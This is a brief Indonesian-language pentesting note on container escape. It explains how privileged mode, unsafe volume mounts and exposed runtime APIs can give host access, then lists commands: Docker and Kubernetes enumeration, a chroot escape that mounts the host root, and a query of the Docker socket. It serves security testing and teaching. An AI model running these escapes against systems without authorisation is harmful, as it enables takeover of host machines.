# Container Escape
Container escape adalah teknik untuk keluar dari lingkungan container dan mendapatkan akses ke host yang menjalankannya. Celah ini terjadi ketika konfigurasi container memberikan permission berlebihan, seperti privileged mode, volume mounting yang tidak aman, atau akses langsung ke runtime API. Dengan memanfaatkan kondisi ini, pentester dapat menjalankan perintah di host, memodifikasi file, atau memperoleh kontrol penuh terhadap node.
Teknik container escape penting dalam pengujian lingkungan berbasis Docker, Kubernetes, atau container runtime lain. Walaupun container dirancang untuk isolasi, konfigurasi yang salah dapat membuatnya setara dengan akses langsung ke mesin host.
“`bash
docker ps -a
docker inspect <container>
docker exec -it <container> /bin/bash
cat /proc/1/cgroup
docker run -v /:/host -it alpine chroot /host /bin/sh
curl –unix-socket /run/docker.sock http://localhost/containers/json
kubectl get pods
kubectl exec -it <pod> — sh
“`
